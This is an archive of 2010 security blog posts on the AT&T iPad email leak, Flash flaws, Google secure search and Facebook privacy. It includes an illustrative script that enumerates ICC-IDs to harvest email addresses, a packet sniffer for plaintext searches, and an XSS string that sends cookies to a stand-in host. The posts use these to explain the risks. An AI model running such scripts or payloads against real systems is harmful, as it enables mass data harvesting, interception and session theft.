Thursday, June 10, 2010

iPad and the Illusion of Privacy

It's been a bad week for Apple. First the wifi choked at Steve Jobs' iPhone 4 demo at WWDC. And now Gawker has reported that AT&T inadvertently leaked the email addresses of 114,000 iPad purchasers.

It should come as no surprise that the culprit here is a web application vulnerability. According to a story on Slashdot, a web service that was supposed to provide an AJAX-type response within AT&T's web apps was left exposed externally. Oops.
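
To make the flaw concrete, here is a hypothetical sketch of the kind of harvesting script such an exposed endpoint invites. The URL, parameter name, and response format are my inventions for illustration; this is not the actual exploit code:

    # Hypothetical reconstruction - the endpoint and parameters are invented.
    import urllib.request, urllib.error

    LOOKUP = "https://example-carrier.invalid/ipad/lookup?icc_id={}"

    def harvest(start, count):
        for iccid in range(start, start + count):
            req = urllib.request.Request(
                LOOKUP.format(iccid),
                # The real attack reportedly presented an iPad-like User-Agent.
                headers={"User-Agent": "Mozilla/5.0 (iPad; like Mac OS X)"})
            try:
                with urllib.request.urlopen(req) as resp:
                    body = resp.read().decode("utf-8", "replace").strip()
                    if "@" in body:  # the service echoes back an email address
                        print(iccid, body)
            except urllib.error.HTTPError:
                pass  # unrecognized ICC-ID; keep iterating

Because ICC-IDs are assigned largely sequentially, guessing valid ones is trivial - which is how a single exposed web service could yield 114,000 addresses.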

A lot of big name people are going to be pissed off. The celebrities on the list are not going to be happy about having their email addresses in the papers. And public officials who expensed the iPad will (or at least should) have some serious explaining to do as to why the taxpayer needs to subsidize their new toy.

Email addresses can be changed. But the leak also exposed something called the ICC-ID, a number that uniquely identifies a device's SIM card.
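
For the curious: an ICC-ID is a (typically) 19 or 20 digit number defined by ITU-T E.118 - an "89" telecom prefix, a country code, the issuing operator, an individual account number, and a trailing Luhn check digit. A minimal sketch of the check-digit math:

    def luhn_valid(iccid: str) -> bool:
        """Verify the trailing Luhn check digit of an ICC-ID."""
        checksum = 0
        # Walk the digits right to left, doubling every second one.
        for i, ch in enumerate(reversed(iccid)):
            d = int(ch)
            if i % 2 == 1:
                d *= 2
                if d > 9:
                    d -= 9
            checksum += d
        return checksum % 10 == 0

The structure is part of the problem: largely sequential account numbers plus a computable check digit make valid ICC-IDs easy to guess.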

At the time of writing (night time EST 6/9) there is still no official announcement on what is going to happen with the leaked identifiers. My guess is that they can't be reliably changed without a manual recall. This raises privacy concerns for the affected users, since ICC-IDs are shared fairly liberally during the course of normal network communications.

But in the end it doesn't really matter. Using an iPad or an iPhone already binds your personal information to your web traffic in a much deeper way than your old fashioned Mac or PC. After all, most iPhones are full of apps that tie your real, actual personal data - your name, credit card, address, etc. - to your device. iTunes works the same way. And unlike a full blown computer, iPhones and iPads afford very little GUI control over what is happening in the background. You could of course gain control through jailbreaking. But that's not the MO of 99% of users, and it violates the terms of service to boot.

I don't mean to justify the leak - users have a reasonable expectation that their personal information is not totally exposed for the world to see. But when you use an iPhone or iPad, you need to realize that your personal data is lurking in thinly veiled form in countless transaction and traffic logs. Although the 114,000 folks whose ICC-IDs are now public domain are slightly more at risk than the rest of us, it is not as though everyone else was operating in anonymity. The AT&T incident demonstrates that on rigid mobile platforms everyone's traffic is just one badly configured web service away from exposure.

It is amazing how quickly mobile communication has gone from the most secure to the least anonymous form of communication. Mobile security has a special place in my heart since the days I served as one of the dozen-odd members of the ETSI Secure Algorithm Group of Experts that standardized the GSM and UMTS encryption algorithms in the first half of the last decade. Back then it was easy - security derived from cryptography, and mobile Internet usage was barely getting off the ground. Today the underlying strength of the mobile cryptographic algorithms is almost irrelevant to most practical attacks. And anonymity is essentially impossible to achieve on devices locked down by both the manufacturer and the operator.

With a brick and mortar PC that connects to networks the old fashioned way, there is a certain default anonymity that even non-technical users can achieve. On locked down mobile devices - where Steve Jobs decides what applications can run and how - a user's identity is at best protected by a myriad of minimalistic authentication mechanisms. For most users, it is worth trading robust privacy in the interest of a rich user experience. That's why millions of users (myself included) own iPhones. But it also means that when the inevitable data breaches occur, there is a lot more information potentially at risk.

Tuesday, June 8, 2010

Napera selling security at the Google Apps Marketplace

Napera Networks announced yesterday the availability of what appears to be the first systems management application in the Google Apps Marketplace.

Google Apps Marketplace was launched in March of this year and is exactly what the name implies - a place to buy and install apps that integrate directly with Google Apps. Most of the 45 offerings currently listed in the Security and Compliance category are related to email security. This makes sense since email is the most popular Google Apps product.

Napera's PC Security Informer is trailblazing as the first security management offering in the Google Apps Marketplace (there are of course plenty of competing cloud security management offerings, such as Shavlik PatchCloud).

Does buying security management from the Google Apps Marketplace make sense?

Luckily for Napera, the usual cloud security FUD will not hold much water with its potential Google Apps Marketplace customers. The small and medium sized businesses that are the target market for Napera's PC Security Informer have already moved big chunks of their infrastructure to the cloud. Since the data is already in the cloud, there is no reason that the security to protect that data shouldn't be in the cloud as well.

The bigger issue for most businesses will be business control, customization, privacy policies, and SLAs. Moving apps to a platform-as-a-service infrastructure is scary from a can-I-get-someone-on-the-phone-when-the-^%&$^-hits-the-fan perspective. And for applications deployed within Google Apps, there are multiple vendors to deal with. When you use a cloud-built-on-a-cloud service like Napera PC Security Informer, you are dependent on both Napera and Google for everything to run smoothly.

The litmus test for the success of any app in the Google Apps Marketplace is whether the integration advantages outweigh the lock-in. The biggest competition for Google Apps Marketplace security products will come from competing hosted solutions. With third party hosted solutions, what you lose in Google Apps integration might be gained back in control and peace of mind.

A challenge for Napera in driving adoption of the PC Security Informer is the nature of the Google Apps customer base. With 25 million users spread over 2 million businesses, the typical Google Apps customer is a ten-guys-working-virtually type of company. Those organizations are not in the market for systems management. Many of the larger companies using Google Apps are still dipping their toes in the water. Those companies are unlikely to realize much advantage from the tight integration with the rest of their Google Apps domain that is the main value-add of the app approach.

I haven't used the product, but it would certainly be interesting to hear from someone who has. Which brings me to a plug for Security Scoreboard, the vendor review site for the security community. If you are a current customer of Napera Networks, please share your experiences on Security Scoreboard and help the rest of the community evaluate this vendor.

Monday, June 7, 2010

Flash Security Under the Microscope

On the heels of Apple's very public tussle with Adobe over Flash support on the iPad, Adobe announced a "critical vulnerability" in Flash on Friday.

Vulnerability announcements happen all the time. For better or worse, the nature of today's software industry is to build first and repair later. But it's been months since Flash experienced a security issue of this scope. And the timing is not good for Adobe, as Steve Jobs specifically mentioned Flash security issues in his "Thoughts on Flash" manifesto in April. With the major media players deciding what graphics and animation standards to support, Flash is under the microscope.

I don't think security usually determines winners and losers in the mass market/desktop environment. But there are rare occasions when the cumulative perception of security vulnerabilities coupled with lingering privacy issues can form a tipping point in the fortunes of a technical standard or company. Many companies are immune to this phenomenon due to a lack of alternatives (for all the user outrage, Facebook is not about to be upended by fledgling alternatives like Diaspora anytime soon). But with HTML5 and other open, web-based standards offering competing functionality, a series of badly handled security vulnerabilities would not augur well for the future of Flash.

Incomprehensible warnings

Miscommunicating vulnerabilities like the one announced on Friday can fall into this straw-that-broke-the-camel's-back category. At the time of writing (Saturday night June 5th) the Adobe announcement does not make clear that all users running current versions are vulnerable and that there is no available fix. Instead, Adobe stated that anyone running Flash version 10.0.45.2 or earlier is at risk. Since there is no version 10.0.45.3, that basically means that by default everyone is potentially vulnerable. Since most non-Rain Man users do not have the version numbers of their installed programs memorized, this should have been more explicitly spelled out in plain English. A more technical explanation could have been included to parse out exactly which installations are at risk.
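
For what it's worth, the version check Adobe left as an exercise for the reader is a few lines of code. A sketch (comparing dotted versions numerically, not as strings):

    def is_vulnerable(installed: str, last_affected: str = "10.0.45.2") -> bool:
        """True if the installed Flash version is at or below the affected release."""
        as_tuple = lambda v: tuple(int(part) for part in v.split("."))
        return as_tuple(installed) <= as_tuple(last_affected)

    print(is_vulnerable("10.0.45.2"))   # True - the then-current release
    print(is_vulnerable("9.0.262.0"))   # True - older releases too
    print(is_vulnerable("10.1.53.64"))  # False - a later release (none existed at the time of writing)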

But even more troubling for the average user is the lack of a viable fix. Adobe has announced that this vulnerability is being exploited in the wild (again, an incomprehensible term for most users…). There appears to be no available patch for the Flash vulnerability. And for the accompanying Reader and Acrobat vulnerabilities the solution is to remove the authplay.dll component that ships with the product. How many users know what a DLL is?
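
To spell out what that workaround actually entails, here is a sketch. The install paths are typical Windows defaults, not guaranteed, and this is an illustration rather than an official fix:

    from pathlib import Path

    # Typical default locations of authplay.dll - assumptions, not an exhaustive list.
    candidates = [
        Path(r"C:\Program Files\Adobe\Reader 9.0\Reader\authplay.dll"),
        Path(r"C:\Program Files\Adobe\Acrobat 9.0\Acrobat\authplay.dll"),
    ]

    for dll in candidates:
        if dll.exists():
            # Renaming suffices: Reader loses Flash rendering but keeps working.
            dll.rename(str(dll) + ".disabled")
            print("Disabled", dll)

Not exactly a one-click fix for the average user.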

Of course Adobe isn't alone in producing vulnerability announcements that are not actionable for most users. And this announcement is far from the worst. My unscientific thumb-in-the-wind estimate would give it a B or B- for clarity, graded on a curve against other major software vendors. But even more problematic, and potentially more damaging to Adobe's long term perch within everyone's browser, is the lack of user control over Flash privacy settings.

Flash's privacy exception

Flash has long existed in its own little fiefdom on the desktop, immune to many of the privacy controls applied to browser plugins. But that situation could be ripe for change. When even Facebook's CEO - with the closest thing the planet has to a universal social network - is literally sweating up a storm over users' privacy concerns, more easily replaced plugins like Flash cannot continue indefinitely to fly under the radar.

Until now Flash has somehow gotten a free pass when it comes to user privacy. In response to user demand, all the major browsers include a private browsing mode that does not record cookies and generally does not leave digital fingerprints on the user's computer (earning it its more colloquial name, porn mode). But Flash doesn't play by these rules. Most users are very surprised to learn that Flash cookies persist on their machines long after they have diligently cleared caches, cookies, and even reset their browsers. The only clue for the average user is the seemingly mysterious way that programs like Pandora still remember them long after they thought they had scrubbed their browser clean. Flash may have a webpage where users can theoretically manage their cookies, but I would guess that only a minuscule portion of users are even aware of its existence.
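
Skeptical readers can check for themselves. Flash stores its cookies as .sol files ("Local Shared Objects") in its own directory tree, out of the browser's reach. A quick inventory sketch, using the usual default locations:

    from pathlib import Path

    # Usual Local Shared Object locations - platform defaults, not guaranteed.
    lso_dirs = [
        Path.home() / ".macromedia/Flash_Player/#SharedObjects",                     # Linux
        Path.home() / "Library/Preferences/Macromedia/Flash Player/#SharedObjects",  # Mac
        Path.home() / "AppData/Roaming/Macromedia/Flash Player/#SharedObjects",      # Windows
    ]

    for base in lso_dirs:
        if base.exists():
            for sol in base.rglob("*.sol"):
                # Each .sol file is a Flash cookie; its path names the site that set it.
                print(sol)

Run it right after "clearing" your browser and the list will be unchanged.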

Regardless of whether you think Flash on a website is cool or just annoying, it's hard to get the full web experience without Flash, and that's why it's installed on 99% of browsers. If Flash were to lose its ubiquity, the transition to competing standards could snowball. With so little information available about the latest vulnerability, it is difficult to know whether it is the result of overzealous feature integration at the price of security. But as the ubiquitous incumbent in the web multimedia war of 2010, Flash will be held - fairly or unfairly - to a higher standard than some of its emerging competitors.

Tuesday, May 25, 2010

Google Secure Search and Security Overkill

Google announced on Friday the availability of a beta version of its secure search.

Secure search? Well, kind of. Google, of course, still retains all your search data. But users will now have the option of searching over an SSL connection. Just type https instead of http in the Google URL and your searches are safe from prying eyes - Google itself and anyone at your desktop excepted.

The rushed timing of the latest announcement is no coincidence. Google has been in some serious hot water over the last few weeks for gathering data from insecure wifi connections using StreetView. Unlike previous Google privacy $@#%-ups, StreetView wifi-gate has users, and especially governments, genuinely annoyed. A big American company driving by in a van and kinda sorta intercepting wifi traffic understandably rubs a lot of folks the wrong way, especially in Europe.

There is a certain delicious irony here. Google gets busted for spying on unencrypted wifi connections, and responds by offering encrypted search. Google is basically saying that you had better think about encrypting your search results, because there are a lot of crazy folks out there who might be trying to listen in. Heck, even we might be accidentally listening in!

Ironic or not, at least this makes some sense. Last week I wrote about Facebook trying to address a growing privacy uproar by offering a totally unrelated security option. While offering a rare mea culpa for the wifi snooping, Google is also using secure search to not-so-subtly castigate users for relying on insecure connections. A bit like Toyota reminding drivers about the importance of seat belts...

[Since we're on the wifi topic, one quick digression - I don't believe for a minute that Google has any interest in spying on user wifi data. With so much data on so many users, the last thing the company needs is to physically go to users to get their information. I take at face value the claim that a "programming error" was responsible for the extraneous data collection. Unlike Facebook, Google has a deeper well of general public sympathy to draw on and my theory is that the public, if not necessarily the legal, aspects of this incident will quickly blow over.]

But back to secure search, which has been in the works for a while and is much more than a response to the wifi incident. Cynics say that secure search is just a ploy by Google to keep precious search data from the ISPs. To me that doesn't hold much water. Secure search will never comprise more than a tiny slice of overall Google searches unless it is the default. And I don't see that happening any time soon.

At the risk of overestimating the importance of the security profession, I would argue that one of the main motivations behind the new service is Google's interest in placating the security purists within organizations considering its enterprise services. As the biggest cloud service provider in the world, Google's entire corporate future is tied into trust and security in web applications. If Google wants to convince users to ditch desktop applications and behind-the-firewall servers in favor of its web-centered universe, it needs to convince enterprises that it takes security uber-seriously. By being the first major player to offer to secure pre-authentication search data, Google casts itself as a cutting edge provider of secure cloud services.

But does secure search fulfill an actual security function that justifies its cost? Or is it a case of security overkill meets security theatre?

Searching away from prying eyes

Let's start with what Google searches over https achieve: by encrypting the connection, they keep your search traffic safe from network sniffers.
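
To be concrete about what a sniffer sees: a plain-http search crosses the wire as readable text, query string and all. A minimal sketch of such a sniffer, assuming scapy, capture privileges, and a position on the same network segment (illustration only):

    from scapy.all import sniff, Raw

    def show_searches(pkt):
        if pkt.haslayer(Raw):
            payload = pkt[Raw].load
            if b"GET /search" in payload:
                # The request line carries the full query, e.g. GET /search?q=...
                print(payload.split(b"\r\n", 1)[0].decode("ascii", "replace"))

    sniff(filter="tcp port 80", prn=show_searches, store=False)

Over https, that same payload is ciphertext.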

Here's my best stab at a list of people/entities you might not want seeing your Google searches:

1. Your husband/wife/roommate/parents
2. Your employer
3. The random sys admin at your Internet cafe, university, etc.
4. Your government or ISP

Secure search does nothing for (1). In case (2), your employer is probably not terminating SSL connections - but they very well may be, so you can't really count on your searches staying private at work. With (4), your government or ISP already has enough information on you (like your entire traffic history) that your search history becomes largely irrelevant.

That leaves (3). The only real advantage of secure search is protecting you in random networks you might be connecting to. This seems like a pretty limited use case. And anyone sufficiently security conscious is already tunneling their traffic on public networks rendering moot the privacy advantage of secure search.

How did you get here?

There is one big privacy advantage to secure search - referrer headers are no longer passed, so the web page you are landing on no longer knows how you got there. The vast majority of Internet users do not realize a simple fact that is obvious to most of the security minded readers of this blog. When you search "furry animals" on Google, and land on www.myfurryanimals.com, the webmaster of the latter sees that you landed there by searching "furry animals". The entire web analytics industry is built around this fact.
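
For those who have never seen this from the server side, a minimal sketch using Python's standard-library HTTP server - every arriving visitor announces how they got there:

    from http.server import BaseHTTPRequestHandler, HTTPServer

    class ReferrerLogger(BaseHTTPRequestHandler):
        def do_GET(self):
            # For a visitor arriving from a plain-http Google search, this header
            # contains the full search URL, query terms included.
            print("Arrived from:", self.headers.get("Referer", "(none)"))
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"Welcome, furry animal lover!\n")

    HTTPServer(("", 8000), ReferrerLogger).serve_forever()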

But you don't need SSL to disable referrer headers. And besides, if someone is so concerned about privacy, they might be better off getting an anonymous proxy. Proxied traffic usually uses encrypted protocols, so at that point using secure search becomes superfluous.

I have no idea what the performance or functionality hit on secure search will be, but for now I don't see the numbers adding up in favor of the service. Searching on the beta Google secure search site seems slightly slower than regular http Google (although admittedly from the confines of a crowded New York cafe on a Sunday evening). So here's my back-of-the-napkin calculation: I probably do 100 Google searches a day. If each of those is 1 second slower (and I'm just making up the numbers here), is it really worth an extra 1 minute and 40 seconds of my time every day to hide my Google search history from a hypothetical person who might want to look at it?

The large majority of users have so many toolbars, widgets, and logged in applications running at the same time that the entire concept of SSL encrypting their search traffic is ridiculous. But even for privacy conscious users this seems like one proverbial bridge too far. Secure search might give users a false sense of privacy with little tangible benefit.

An interesting project by the Electronic Frontier Foundation called Panopticlick shows that your browser basically provides servers enough information to be uniquely identifiable. With all the fonts, plugins, and other settings your browser exposes, a website can identify you as a return visitor even if you are behind an anonymous proxy. For the average user, online privacy is a bit of a heads-they-win-tails-you-lose proposition. No matter what measures they take, it turns out that they are still traceable online.
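
The principle behind Panopticlick is simple enough to sketch: hash together the attributes your browser volunteers on every visit, and the result is a stable pseudo-identity that survives any cookie purge. A toy version (the real project uses many more attributes and measures their entropy):

    import hashlib

    def fingerprint(user_agent, fonts, plugins, screen, timezone):
        """Toy browser fingerprint: a hash over freely volunteered attributes."""
        material = "|".join([
            user_agent,
            ",".join(sorted(fonts)),
            ",".join(sorted(plugins)),
            screen,
            timezone,
        ])
        return hashlib.sha1(material.encode("utf-8")).hexdigest()[:16]

    print(fingerprint(
        "Mozilla/5.0 (Windows; U; Windows NT 6.1) ...",
        ["Arial", "Comic Sans MS", "Wingdings"],
        ["Flash 10.0.45.2", "QuickTime", "Java"],
        "1280x800x24",
        "UTC-5",
    ))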

All this certainly shouldn't be construed as meaning that secure search is useless. Whatever one thinks of Google's privacy policies, the company does offer a rich set of user security configuration options. With features like tying password reset to a mobile number, showing the last IP addresses that logged into a Google Account, and default SSL for many enterprise applications, Google offers a security arsenal more robust than that of many of its competitors. I'm just not sure secure search adds much to this portfolio.

Friday, May 21, 2010

Facebook and Security Minimalism

Facebook can't seem to catch a break. Just this Wednesday an XSRF bug was announced that gave access to birthdates users had designated as private.
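
For the uninitiated: XSRF (cross-site request forgery) tricks a victim's logged-in browser into submitting a request the victim never intended, riding along on the session cookie. The textbook defense is a per-session secret token that a third-party site cannot know. A bare-bones sketch, with all names invented:

    import hashlib, hmac, secrets

    SERVER_KEY = secrets.token_bytes(32)  # kept server-side, never exposed

    def csrf_token(session_id: str) -> str:
        """Token derived from the session; embedded in every legitimate form."""
        return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

    def verify(session_id: str, submitted: str) -> bool:
        # A forged cross-site request carries the victim's cookie but cannot
        # know this token, so it fails the check.
        return hmac.compare_digest(csrf_token(session_id), submitted)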

Not that Facebook users care. I would bet dollars to proverbial donuts that no more than 0.01% of Facebook users have ever heard of XSRF. And more importantly, I would bet that almost none of them have really suffered from these vulnerabilities. Bad security in social networks is a non-story. Lax privacy policies, on the other hand, are much more in your face. No user is going to notice an insecure version of Python running on your webserver. But share their data with unauthorized contacts and the same user might go berserk.

User apathy notwithstanding, Facebook is making some half-hearted attempts to calm the masses. The company announced last Thursday the ability to limit the devices from which an account can be accessed. But this attempt to soothe the raging Facebook villagers with sharpened pitchforks is misdirected. Users are concerned about who Facebook is sharing their information with, not how. Device authentication - a poor man's security control at the best of times - is an unnecessary inconvenience to the vast majority of users and an insufficient safety control for the truly paranoid.

Facebook is no fool, of course. You don't build a business that engages every tenth adult on the planet without honing a pretty good sense for which way the wind is blowing. The company realizes that it is under no obligation to provide any real security controls to its users. Providing window dressing security such as device authentication is a good way to appear conscientious to a public that tends to conflate security with privacy. And in any case, the risk that device authentication addresses - preventing User A from logging in as User B - is the one area where Facebook and its users have a common interest.

So Facebook's mission is not entirely at odds with security. Facebook has an interest in providing application security insofar as it does not impede its vision of becoming the web's authoritative social platform (more on that in a bit). But beyond that, why would Facebook provide security that involves substantial resources or limits its collaborative abilities? Facebook may throw its users a security bone when it comes on the cheap, but the company is under no obligation to provide anything beefier.

Really? Here is a simple fact most security folks won't like - unless you are in a regulated industry, you are under almost no specific obligation to offer secure web applications. Unlike privacy regulations, this statement is true across all major jurisdictions. Laws will limit who you can share data with, and in some cases - such as data collected from children - whether it can be collected to begin with. But they impose virtually no requirements on small businesses as to how, or even whether, they need to secure their data.

This means that anybody can fire up a web application and start collecting, storing, and processing data that may or may not be sensitive to its owner. And they can do this while being under almost no legal or business requirement to provide adequate security.

With hosting costs approaching zero and development frameworks hiding the uglier layers of the stack, this means that any old schmo can be in business in no time. Just like you can blog on Blogger without touching any code, you can now build some pretty impressive quasi-professional web apps without touching any real code. Millions of people have done exactly that.

But what about big apps? Surely the ubiquitous brand name web applications are subject to some sort of control that two guys in their garage are not? Well, not really. The fact is that many web 2.0 apps that are in common enterprise use are probably not more than 5 or 10 guys. They may look like big businesses, but the beauty of the Internet is the ability for small organizations to amplify their presence and take on the trappings of the big boys.

Today there are gazillions of sites out there - doing anything from storing files to reformatting reports - that operate with almost zero intentional application security. And it's not just small or medium sized businesses. Even the big players are, at the end of the day, only subject to restrictions on who they can share data with. Having mostly evolved from small start-up operations, they take an understandably minimalist approach to information security. Application security - in stark contrast to privacy - is basically a good faith effort.

The kerfuffle around Google's recent StreetView-wifi snafu is a good example of the priority of privacy over security. Apparently Google's StreetView had collected information from open wifi networks. Google has attracted a great deal of negative press and is facing numerous investigations in Germany and elsewhere as a result. At the same time, the numerous security vulnerabilities that are routinely exposed at most large companies hardly register on the legal radar screen, and are certainly not something that will get investigated. You don't trigger an EU investigation by having too many bugs to patch in a given release or by using a vulnerable version of PHP.

The More Social, The Less Secure

That's not to say that security and privacy are totally unrelated in social networks. If Facebook wants to build a platform that others can plug into, it necessarily opens the application to vulnerabilities. A very good example of this is the recent hiccup with Yelp. Facebook's Instant Personalization exposed users to a cross-site scripting vulnerability on Yelp that could harvest user data. Without the Yelp integration, this vulnerability would never have happened.
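
The mechanics in a nutshell: data trusted in one context (profile data from Facebook, say) gets rendered unescaped in another (a Yelp page), so a "name" containing script executes in every visitor's browser. The unglamorous fix is output escaping - a sketch with invented data:

    import html

    profile_name = '<script>send(document.cookie, "evil.example")</script>'

    # Vulnerable: hostile markup is executed by every visitor's browser.
    page_bad = "<p>Welcome back, %s!</p>" % profile_name

    # Safe: the same data rendered inert.
    page_good = "<p>Welcome back, %s!</p>" % html.escape(profile_name)
    print(page_good)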

When it comes to social networks, there is no free security lunch. Collaborative services are by definition less secure. Facebook is meant to be collaborative and thus can never offer the same level of security as a more gated service. This is the same reason that Times Square cannot be secured in the same way an airport can. One is meant to be open and one is meant to be closed, or at least controlled. Although hundreds of security vendors may try to secure web 2.0 applications, robust security and social collaboration are ultimately opposing aims.

Of course there are numerous technological standards that are being built precisely to secure the web 2.0 world. The move to OAuth from BasicAuth (a transition that Twitter will be enforcing next month) is a good example. But from a business perspective, the raison d'etre of most social applications is the collaboration, not the security. When web services communicate, there is generally only one level of authentication required to reach the crown jewels. Unlike traditional applications, most web services only require one screw-up or misconfiguration to expose your data.
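
The difference is easy to see on the wire. Basic Auth sends a reversibly encoded copy of your actual password with every request; OAuth sends a revocable token instead. A sketch of why the former had to go:

    import base64

    # What Basic Auth puts in the Authorization header of *every* request:
    header = "Basic " + base64.b64encode(b"alice:hunter2").decode("ascii")
    print(header)  # Basic YWxpY2U6aHVudGVyMg==

    # Anyone who sees that header - a proxy, a log file, a sniffer -
    # recovers the password in one line:
    print(base64.b64decode(header.split()[1]))  # b'alice:hunter2'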

Social Media vs the Enterprise

This single-line-of-defense approach that most web 2.0 applications take is sufficient for most individual personal data. Your Facebook settings may keep photos of you drinking at a keg party hidden from your work colleagues, but their accidental exposure is not such a big deal and is a risk most users are willing to assume. In our personal lives, there is no breach notification, limited personal financial liability, and a much lower expectation of due care. Even the recent mess-up exposing friends' private chats on Facebook was probably met with a stuff-happens shrug by everyone not directly affected.

But enterprises should - in theory - be more cautious. Breaches can carry real costs, financial liability is more substantial, and there are often contractual obligations to provide security. Indeed while there might be no affirmative legal obligation for application providers to provide security, customers may very well be prevented from using their services if there is insufficient security. After all, most enterprises that deal in personal data are under some form of contractual obligation to reasonably protect that data.

Will this raise the bar for small providers of cloud services? Unlikely. As I have frequently ranted about in the past, in non-regulated industries these obligations usually refer to some dinosaur-like provisions about SSL and biometric readers at server room entrances. Unless a company is truly conscientious about applying the meaning of due and reasonable care, there are practically no legal or contractual security requirements to which web applications are subject. (This is of course not true of heavily regulated industries like finance, but most corporations are operating in much more loosely regulated spaces).

Many enterprises are driving full steam ahead with the integration of minimally secured third party web applications into the enterprise. The transition from walled-off silo to full member of the application ecosystem is well underway. We may not be in a Jericho-Forum world of perimeterless utopia, but we are in the awkward teenage state of integrating our IT environment with hundreds of smaller companies - through APIs, SDKs, and the like.

Much like real life, digital hookups put enterprises at risk - you no longer have to worry just about who you are with, but everyone they have been with and will be with in the future. And just like real life, the process of evaluating the safety of a potential application hookup is largely heuristic. With an increasingly promiscuous digital environment, we lose the ability to do a full battery of tests on each potential partner (and belated apologies for the lame analogy).

For individuals, the risks of collaborative web services are far outweighed by the benefits. That's the reason that Facebook has 400 million users and why thousands of popular applications with only the thinnest veneer of authentication thrive. This risk calculus will also hold for many enterprises, both large and small. For more security heavy environments, however, fundamental changes will be needed. For some environments it will take a lot more than device authentication to make today's handy web applications ready for enterprise prime time.

Tuesday, April 27, 2010

Application Security Underfunded

Imperva and WhiteHat just came out with a report on security spending and resource allocation (registration required). This report is a must-read for anyone who is in charge of security budgets.

The basic gist of the report is that application security is not getting its rightful share of the security spending pie. This is perhaps an unsurprising conclusion for a study sponsored by web application security vendors, but the real mystery is why the wider security industry is not talking more about this undeniable and perplexing spending imbalance in the security industry. Simply put, most threats are web based, but most security budgets are not. Why?

Here are a few reasons I can think of for the spending imbalance:
  1. Decision makers are unaware of the relative risks.
  2. Inertia.
  3. Legal and regulatory requirements overlook web app security.
  4. The perception that web application security cannot be solved by throwing money or resources at it.

All these factors feed into one another, but there is one other factor at play that is internal to the security industry itself. By and large, the same security standards have traditionally been applied to an incredibly broad swath of companies. Rather than raising the standard for everyone, this approach has had the de facto effect of exempting certain companies from what they perceive to be irrelevant requirements. This in turn drags the entire market down to the lowest common denominator. By using the same hammer to hit all nails, the security industry has inadvertently generated a "security race to the bottom".

One Size Fits None

Some companies operate in highly regulated and highly sensitive environments where security is not up for debate. Let's call this the Fort Knox zone. In the Fort Knox zone, web application security is governed by detailed SLAs on remediating vulnerabilities and applying secure development processes. In this zone, the security of the web application is considered an inherent part of the finished product or service. Everybody thinks and breathes security. These are the big banks and the three letter agencies amongst others.

Then there's the Pragmatic zone, where security matters, but where business decisions are constantly being made to balance security against price, convenience, and functionality. Most businesses fit in the Pragmatic zone even though they might deal with sensitive data. Online health records is one example. For most people, the risk that a random hacker might find out their medical allergies pales in comparison to the risk that in an emergency a doctor might be unaware of those allergies. In the Pragmatic zone, security takes a back seat to functionality, but basic security remains highly desirable.

Finally there is the Whatever zone - a place where basically everything you use is at your own risk. This is the guy who runs a cool web service from his parents' basement that allows you to see when you and your buddies are both within stumbling distance of the same pub. In the Whatever zone, there is no guarantee - and often no mention - of security. It's not that security is trumped by other considerations. It simply was never really a consideration to begin with. And if you don't like it, don't use it.

The Failed Quest for the Esperanto of Security

Today's security industry speaks largely in the language of the Fort Knox zone. "Critical" and "severe" vulnerabilities are presented as something that must be fixed in as short a time as possible. But most businesses are actually graduates of the Whatever zone that are today in the Pragmatic zone. The shrill tone of vulnerability disclosures, coupled with their frequently monolithic approach, produces tone-deaf customers and businesses.

In other words, the real problem is not that there are so many insecure apps out there, but rather that as an industry we set a bar that is both unattainable and inappropriate for many applications. Consider the very recently published OWASP Top 10 web application security risks. Many companies and many security folks view this list as an all-or-nothing proposition (although OWASP makes clear that it isn't). There is no inherent reason that all web applications need to be immune to all these threats. It just takes too much effort with far too little return. And this isn't even counting the opportunity cost of fixing security vulnerabilities.

The specific metrics of the WhiteHat-Imperva report underscore why the absolute approach does not work. Take for example the 38% of respondents who believe that 20 hours of developer time are needed to fix a vulnerability. Regardless of whether this figure is perception or reality, there is no way that a small operation is going to budget 20 hours to fix a seemingly obscure vulnerability when that time could be used to fix a visible bug or build a new feature. The return for spending lots of extra money to truly lock down most apps is just not there - not in the customer recognition, not in improved regulatory compliance, and often not even in a reduction in damaging security incidents (or at least not in a way that is readily measurable for organizations with limited resources).

So it shouldn't really surprise us that vulnerabilities aren't getting fixed. In most companies if the website doesn’t actually work there is hell to pay. But if there is an unfixed vulnerability almost no one knows or cares.

The User Has Spoken (while logging in over http)

This user indifference runs deep. I never cease to be amazed by the number of early and even mid-stage start-ups that don't have login over https. From a security, or even a marketing, perspective secure login seems like a no-brainer – certificates are relatively easy to install, and it is one of the few – perhaps the only – security mechanisms that almost every single end user is on the lookout for. So it is very telling that many start-ups do not consider it worth even the slight pain-in-the-ass that using certificates introduces.
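
The fix really is modest. Beyond buying and installing the certificate, it amounts to a few lines of middleware to keep credentials off plain http. A sketch in the generic WSGI style, with the sensitive paths assumed:

    def require_https_for_login(app):
        """WSGI middleware: bounce plain-http requests on sensitive paths to https."""
        def wrapper(environ, start_response):
            insecure = environ.get("wsgi.url_scheme") == "http"
            sensitive = environ.get("PATH_INFO", "").startswith(("/login", "/signup"))
            if insecure and sensitive:
                target = "https://" + environ.get("HTTP_HOST", "") + environ["PATH_INFO"]
                start_response("301 Moved Permanently", [("Location", target)])
                return [b""]
            return app(environ, start_response)
        return wrapper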

As security professionals this may seem jarring, but these start-ups know their business better than anyone else. They have figured out a well known secret of today's Internet -

Much of the Internet is pretty much useless if you follow security rules.

OK, that’s a bit harsh. But conventional security wisdom does not jibe with having fun or even getting things done online. There are just too many things you miss out on online if you actually abide by all the security rules that the purists preach. (Here's a simple list for starters - storing passwords on your iPhone, storing passwords in your browser, giving up your passwords for application integration, simultaneously logging on to numerous applications, and the list goes on).

So as an end user, you basically have a choice – seriously handicap your use of the Internet, or take your chances with a half-hearted that's-what-everyone-does attempt to minimize risk (aka anti-virus). The vast majority of end-users have opted for the latter. Or put differently, end users are fundamentally happy with the Whatever zone of security.

The low bar from home to enterprise

Most companies start operations in much the same way - in the Whatever zone of security. They need to push something out fast and get to market with the bare minimum of features. And the barely-working mentality applies to security just as much as anything else.

It's here that the seeds of the specific spending disparity described in the Imperva-WhiteHat study first come to light. Application security comes with real project risk costs. This is in stark contrast to network security – you can secure your network layer fairly easily without risking screwing up your app. Compare the pain of setting up a WAF with the relative ease of setting up a firewall. When a small company needs to choose how to answer the security checkbox that most customers will never look beyond, the choice is clear. And so the imbalance is born - Network security 1, Application Security 0.

